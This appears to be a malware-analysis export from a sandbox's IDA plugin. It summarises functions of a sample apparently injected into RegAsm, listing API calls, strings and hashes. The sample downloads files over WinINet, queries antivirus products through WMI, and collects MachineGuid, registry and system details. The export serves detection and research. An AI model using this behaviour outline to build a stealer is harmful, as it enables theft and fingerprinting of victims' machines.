Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$Processmemset$MemoryOpenRead
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 47329967-1622206642
Opcode ID: 1b115c04a358f66ae5b9cc5224adfa24bdf08062a89fa872ad74c5b1b014d4dc
Instruction ID: 21a460605aad31a862c186db400c004e6ee40eb0e1eca90a670e2fa51daa2b6d
Opcode Fuzzy Hash: 1b115c04a358f66ae5b9cc5224adfa24bdf08062a89fa872ad74c5b1b014d4dc
Instruction Fuzzy Hash: ED612171D04208AAEB30DBA1DC42BEFBA78AF80314F14413EF915776C1D77C59888BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413EA0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 159stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
lstrlen.KERNEL32(00000000), ref: 00413F4E

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
lstrlen.KERNEL32(00000000), ref: 00413F8F
lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

ERROR, xrefs: 00413F29
2HA, xrefs: 00414095, 00413FD9
2HA, xrefs: 004140BB
ERROR, xrefs: 00413FFA
ERROR, xrefs: 00413FBE
ERROR, xrefs: 00414051
ERROR, xrefs: 00414010

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
String ID: 2HA$2HA$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 2440237315-3818902335
Opcode ID: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction ID: c74f93b79e1a96af938dd9262021b5edd6203cb7113eed4730bfd43c5734313e
Opcode Fuzzy Hash: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction Fuzzy Hash: 7E519134901249AACB11EBA5C9517DDBBA8AF19308F64407EF90573282DF7C5B48C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00411260 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 136comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 00411670: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0041136B,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000), ref: 00411678
Part of subcall function 00411670: CharToOemW.USER32(?,00000000), ref: 00411685

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

VariantClear.OLEAUT32(?), ref: 0041137D

Strings

displayName, xrefs: 00411357
Unknown, xrefs: 00411394
root\SecurityCenter2, xrefs: 004112C6
Select * From AntiVirusProduct, xrefs: 004112F7
WQL, xrefs: 00411304
Unknown, xrefs: 0041139B

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 685420537-2776955613
Opcode ID: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction ID: 40a9cb50dccdf73a38e95a76c9e526bc5b1cbb250bb0618e8cd6fd3f3244c3ba
Opcode Fuzzy Hash: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction Fuzzy Hash: 6C417F71B01629ABCB20DB85DC49FEFBB78EF49B50F10421AF515A7290C7789941CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00410860 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 210registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

RegOpenKeyExA.KERNEL32(00000000,01456570,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF
RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
wsprintfA.USER32 ref: 00410947
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
RegQueryValueExA.KERNEL32(?,01461DB8,00000000,000F003F,?,00000400), ref: 00410995
lstrlen.KERNEL32(?), ref: 004109AA
RegQueryValueExA.KERNEL32(?,01461DD0,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Strings

- , xrefs: 00410A38
?, xrefs: 004108B5
%s\%s, xrefs: 00410941

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 1989970852-3278919252
Opcode ID: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction ID: 46b3b7c26f9db54fd8d8a07889e13f83e758814ada42e2adbf2fffcbf2ed9ca1
Opcode Fuzzy Hash: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction Fuzzy Hash: 158148B190021DABCB14DBA5DC94AEEBBB8BF59704F10816EF505B3241DB785A48CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D90 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
HeapAlloc.KERNEL32(00000000), ref: 00410E54
wsprintfA.USER32 ref: 00410E91
lstrcat.KERNEL32(00000000,00428098), ref: 00410EA0

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

lstrlen.KERNEL32(00000000), ref: 00410EC2

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

lstrcat.KERNEL32(00000000,00000000), ref: 00410EF0

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

C, xrefs: 00410DD2
:\, xrefs: 00410DF7

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 2389002695-3309953409
Opcode ID: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction ID: cd9e33ec6b3912d753ff03e78be9aa97267fc370a97b6a7823d5d9fd7b56550d
Opcode Fuzzy Hash: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction Fuzzy Hash: 3C41F571900219ABDB10EBE4DC15BEEBBB9EF18704F10015EFA05B3281DB785A44C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00405850 Relevance: 15.1, APIs: 10, Instructions: 147networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5
StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,0000000D), ref: 004058ED
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
InternetCloseHandle.WININET(00000000), ref: 004059BB
InternetCloseHandle.WININET(00000000), ref: 004059C2

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
String ID:
API String ID: 105467990-0
Opcode ID: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
Instruction ID: 13221a786792afbe71e2db2b5b3dd3a866a49aaf32af835bc09817eda76de5d3
Opcode Fuzzy Hash: b105dae5c726c87f236add07edf50401fe4d652777b786edf905304db798c208
Instruction Fuzzy Hash: 8C518F75500249EBDB10DBA0CC46FEE77B8EB05704F60416AFA01E72C1DB786A48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004043C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00404412
??_U@YAPAXI@Z.MSVCRT ref: 0040441F
??_U@YAPAXI@Z.MSVCRT ref: 0040442C
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Strings

<, xrefs: 00404402
zZ@, xrefs: 0040443D, 0040444D, 0040446B
zZ@, xrefs: 0040447A

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <$zZ@$zZ@
API String ID: 1274457161-2926614232
Opcode ID: de321b7af41221ec208d27f0568573924e6c00b46f5a2e4a9ebbe931de8dac36
Instruction ID: 5ec785183fc32c623f1de6a7566c658e8ea65be6cb1651013de8fb2e27aaef0e
Opcode Fuzzy Hash: de321b7af41221ec208d27f0568573924e6c00b46f5a2e4a9ebbe931de8dac36
Instruction Fuzzy Hash: 1C2160B5900208EBDB00DFA4D885BDD7BB8FF05724F14022AFA25A72C1DB395A45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB50 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0145F6D0,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040EBB0
StrCmpCA.SHLWAPI(00000000,0145F710,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040EC3A
StrCmpCA.SHLWAPI(00000000,0145F720,?,?,?,?,?,?,?,?,?,?,?,00000000,00421CF0,000000FF), ref: 0040ED6A

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

StrCmpCA.SHLWAPI(00000000,0145F6D0), ref: 0040EE24
StrCmpCA.SHLWAPI(00000000,0145F710), ref: 0040EEB0

Strings

Stable\, xrefs: 0040EC7D
Stable\, xrefs: 0040EEF3

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\
API String ID: 3722407311-4033978473
Opcode ID: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction ID: d8ce4b8c1e13b8f110d5154c309a70af36248a3d2e26b75c81aeb3fa987dec21
Opcode Fuzzy Hash: f54e906f9e69dee7ad1047260745225b443c7ea696a6296acf4938656316a391
Instruction Fuzzy Hash: E4E1CA70900248DBCB14EFA9C946BDDBBB5AF59304F10C16EF945A7382DB785608C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00418860 Relevance: 10.6, APIs: 7, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00418970: LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
Part of subcall function 00418970: GetProcAddress.KERNEL32(00000000,0144F198), ref: 00418990
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F228), ref: 004189BD
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F240), ref: 004189D6
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F450), ref: 004189EE
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F498), ref: 00418A06
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,01453258), ref: 00418A1F
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,014529C0), ref: 00418A37
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,01452AA0), ref: 00418A4F
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4B0), ref: 00418A68
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4C8), ref: 00418A80
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4E0), ref: 00418A98
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F4F8), ref: 00418AB1
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,01452BC0), ref: 00418AC9
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F468), ref: 00418AE1
Part of subcall function 00418970: GetProcAddress.KERNEL32(76210000,0144F510), ref: 00418AFA

Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082

Part of subcall function 00401090: CreateDCA.GDI32(014532F8,00000000,00000000,00000000), ref: 0040109D
Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014532E8,?,00428884,?,00000000,004283B2), ref: 004188F6
CloseHandle.KERNEL32(00000000), ref: 00418901
Sleep.KERNEL32(00001B58), ref: 0041890C
OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418922
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041893C
CloseHandle.KERNEL32(00000000), ref: 0041894A
ExitProcess.KERNEL32 ref: 00418952

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
String ID:
API String ID: 3108587868-0
Opcode ID: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction ID: 647acd411ead89d836921b015eed4027088bc395b0a35a31edabbaa9f7aa6c77
Opcode Fuzzy Hash: 1d8b1de72db4383d4400f6d01818f042c6ed5c7fe0d4ca9eea97ec86f2159df5
Instruction Fuzzy Hash: BA217F309001096AD700F7F1DC56FEE7369AF05709F50012EF606B60D2DF7C2989866D

Uniqueness

Uniqueness Score: -1.00%

Function 00410C90 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410CB5
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
CharToOemA.USER32(00000000,?), ref: 00410D12

Strings

MachineGuid, xrefs: 00410CEE
SOFTWARE\Microsoft\Cryptography, xrefs: 00410CC8

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-1211650757
Opcode ID: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction ID: 734486b7100e6d63ed2b29b9d7cba1e03fbf9e6038e99d6900f302105bc7df50
Opcode Fuzzy Hash: c5de048e1d1cde4379b446a0d5fa29705f724f43fda2a5672e90642c938baa44
Instruction Fuzzy Hash: 8601B579640219ABD724DB90DC4AFE97778AB14704F104199B645621C0DAB46A858B50

Uniqueness

Uniqueness Score: -1.00%

Function 004106E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
wsprintfA.USER32 ref: 0041073B

Strings

@, xrefs: 0041070E
%d MB, xrefs: 00410735

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
